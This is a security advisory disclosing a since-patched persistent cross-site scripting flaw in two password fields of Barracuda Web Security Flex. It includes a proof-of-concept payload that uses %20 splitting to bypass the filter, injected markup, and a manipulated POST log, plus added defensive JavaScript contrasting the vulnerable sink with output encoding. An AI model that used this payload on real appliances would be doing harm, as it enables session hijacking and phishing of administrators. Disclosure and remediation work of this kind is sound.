Web Security Flex v4.x (BNSEC707) - Filter Bypass & Persistent Vulnerabilities


Filter Bypass & Persistent Vulnerabilities in Shared Secret & Bypass Password patched!

Barracuda Networks has announced a patch for the official Web Security Flex appliance web application. The two security issues were reported by the Vulnerability Laboratory team. Barracuda has already resolved the issues and will soon publish a final security bulletin, which will be linked to our advisory.

The persistent vulnerabilities are located in the "bypass_password" and "shared_secret" parameters of the `Remote Filtering > Safe Browser > Provisioning` module. The attacker is able to bypass the `shared password/secret` input field validation and manipulate the input field context. The script code executes after the attacker clicks the `shared secret` show/hide button in the `Provisioning` service module. The attack is application-side, and the request method used to inject the payload is POST.

To bypass the input field validation and execute the earlier injected string via POST, the payload has to be split with `%20`. During the pentest we found that script code execution (HTML, JS and PHP) is possible. The input validation is broken, and through the reverse `hide/show` function it is possible to manipulate the application context or capture the input.

The security risk of the persistent vulnerabilities is estimated as medium, with a CVSS (Common Vulnerability Scoring System) score of 3.8. Exploitation requires low user interaction and a registered low-privileged web application user account. Successful exploitation results in session hijacking (manager/admin), persistent phishing, persistent external redirects or persistent manipulation of the affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] Web Security Flex

Vulnerable Module(s):
[+] Remote Filtering > Safe Browser > Provisioning

Vulnerable Function(s):
[+] hide input
[+] show input (reverse)

Vulnerable Parameter(s):
[+] bypass_password
[+] shared_secret

Affected Module(s):
[+] Provisioning


Proof of Concept Information:

The persistent web vulnerabilities can be exploited by remote attackers and by local low-privileged user accounts with low or medium user interaction. To demonstrate or reproduce the vulnerability, follow the information and steps below.

PoC: String (Bypass %20)
%20<iframe%20src=a>%20%20%20%20"><iframe src=a onload=alert("VL") <

PoC: (Context Show & Hide Function) [bypass_password & shared_secret]

<div class="field">
<label class="label" for="bypass_password">Bypass Password:</label>
<input name="bypass_password" id="bypass_password" value="northhigh" type="password">
<small onclick="$('#bypass_password_ct').show().find('strong').html($('#bypass_password').val())" class="link2">show</small>
<span class="info" id="bypass_password_ct" style="">

<br> Password: "
<strong>%20"><[PERSISTENT INJECTED SCRIPT CODE!]%20"><[PERSISTENT INJECTED SCRIPT CODE!]")
<%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <") <northhigh</iframe>
</strong>" —
<span class="link2" onclick="$(this.parentNode).hide()">hide</span></span>        </div>
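The `show` handler in the markup above passes the raw field value to jQuery's `.html()`, which is why a value that survives the input validation is rendered as markup rather than as a password string. The following is an added example, not code from the advisory or from Barracuda: it models that handler as a plain string function, places the hardened version (output encoding, equivalent to using `.text()` instead of `.html()`) next to it, and shows why a first-character input filter (a hypothetical filter of the class that leading `%20` padding defeats, not a claim about the appliance's actual filter) is only a secondary control. The sample input is the advisory's own PoC string with the `%20` sequences decoded; it runs under Node.

```javascript
// Added example (not Barracuda's code): string-level model of the PoC's
// "show" handler versus an output-encoded version. Runs under Node.

// Constructed input: the advisory's PoC string with %20 decoded to spaces.
const POC_VALUE = decodeURIComponent(
  '%20<iframe%20src=a>%20%20%20%20"><iframe src=a onload=alert("VL") <'
);

// Model of the vulnerable handler: the value is interpolated as markup,
// which is what $('#..._ct').find('strong').html(value) does in the browser.
function vulnerableShow(value) {
  return '<strong>' + value + '</strong>';
}

// Encode the five characters that can change HTML context. jQuery's .text()
// (or element.textContent) gives the same result without hand-rolling it.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened handler: the secret is rendered as text, never as markup.
function safeShow(value) {
  return '<strong>' + escapeHtml(value) + '</strong>';
}

// Demo check: does the rendered markup contain any tag other than the
// wrapping <strong>? A real test harness would use a DOM parser instead.
function introducesTag(markup) {
  const inner = markup.slice('<strong>'.length, -'</strong>'.length);
  return /<[a-z!\/]/i.test(inner);
}

// Hypothetical input-side filter (an assumption about the class of defect,
// not the appliance's code): it only inspects the first raw character, so a
// value padded with a leading space is never rejected.
function naiveReject(value) {
  return value.startsWith('<');
}

// Normalise first, then reject angle brackets anywhere. Still secondary:
// safeShow() is what actually closes the sink.
function strictReject(value) {
  return /[<>]/.test(value.trim());
}

// Run directly: node show_secret_demo.js
console.log('vulnerable model renders a tag :', introducesTag(vulnerableShow(POC_VALUE)));
console.log('hardened model renders a tag   :', introducesTag(safeShow(POC_VALUE)));
console.log('naive filter rejects PoC value :', naiveReject(POC_VALUE));
console.log('strict filter rejects PoC value:', strictReject(POC_VALUE));
```

The point of the pairing is that encoding at the output sink does not depend on guessing every padding or splitting trick the input filter misses; once the value is written as text, the `%20` bypass described above has nothing left to exploit.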

--- POC Session Logs (MANIPULATED TO BYPASS) [POST] ---
auth_scheme=none
session_timeout=0
idle_timeout=0

shared_secret=%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Da%3E%2520%2520
bypass_password=%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Da%3E%2520%2520%2520%2520%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Da+onload%3Dalert(%22VL%22)+%3C

bypass_filter=192.168.*%3B10.10.*%3B172.16.*
fail_open=1
enable_geolocation=1
allow_temp_disable=1
allow_stop=1=
is_ajax=1
ajax_response_format=json

Reference(s):
https://wsf.127.0.0.1:1338/r/mobile

Video: https://www.youtube.com/watch?v=1D9PS4bW8VM

Advisory: http://www.vulnerability-lab.com/get_content.php?id=749
